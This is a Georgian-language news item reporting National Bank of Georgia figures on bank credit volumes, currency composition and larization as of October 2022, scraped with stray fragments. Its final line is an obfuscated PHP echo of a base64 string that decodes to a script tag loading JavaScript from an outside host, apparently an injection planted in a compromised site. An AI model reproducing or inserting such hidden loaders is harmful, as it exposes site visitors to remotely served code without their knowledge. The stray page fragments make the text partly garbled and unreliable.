celsiusi
ავერსი შნაიდერი
საქართველოს ეროვნული ბანკის მიერ გამოქვეყნებული სტატისტიკის მიხედვით, 2022 წლის 1 ოქტომბრისთვის ქართული ბანკების მიერ გაცემული კრედიტების მოცულობამ 42,94 მილიარდ ლარს მიაღწია. სექტემბრის განმავლობაში გაცვლითი კურსის ეფექტის გარეშე საბანკო კრედიტები 1.08%-ით გაიზარდა, ხოლო კურსის ეფექტის (ლარის გამყარების) გათვალისწინებით, კრედიტების მოცულობა 0.64%-ით შემცირდა.
 
ეროვნული ბანკის ინფორმაციით, ამავე პერიოდში ეროვნული ვალუტით გაცემული სესხების მოცულობა 384.81 მლნ ლარით (1.67%-ით) გაიზარდა, ხოლო უცხოური ვალუტით გაცემული სესხების მოცულობა 660.33 მლნ ლარით (3.28%-ით) შემცირდა (გაცვლითი კურსის ეფექტის გარეშე, გაიზარდა 0.42%-ით).
 
“რეზიდენტი იურიდიული პირებისათვის 2022 წლის სექტემბრის ბოლოს, კომერციულ ბანკებს ეროვნული ვალუტით გაცემული ჰქონდათ 7.07 მლრდ ლარის (წინა თვესთან შედარებით 2.81%-ით მეტი), ხოლო უცხოური ვალუტით 12.10 მლრდ ლარის (წინა თვესთან შედარებით 3.51%-ით ნაკლები) მოცულობის სესხი (გაცვლითი კურსის ეფექტის გარეშე, 0.19%-ით მეტი).
 
2022 წლის სექტემბრის განმავლობაში 0.07%-ით, ანუ 16.64 მლნ ლარით შემცირდა რეზიდენტი შინამეურნეობების სექტორის დაკრედიტების მოცულობა და მიმდინარე წლის პირველი ოქტომბრისათვის 22.97 მლრდ ლარი შეადგინა.
 
მიმდინარე წლის პირველი ოქტომბრისათვის, მთლიანი სესხების ლარიზაციის კოეფიციენტმა 54.68 პროცენტი შეადგინა, 2022 წლის პირველი სექტემბრის მდგომარეობასთან შედარებით, გაიზარდა 1.24 პროცენტული პუნქტით (გაცვლითი კურსის ეფექტის გამორიცხვით, გაიზარდა 0.31 პროცენტული პუნქტით),”- ნათქვამია სებ-ის ანგარიშში.
564
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");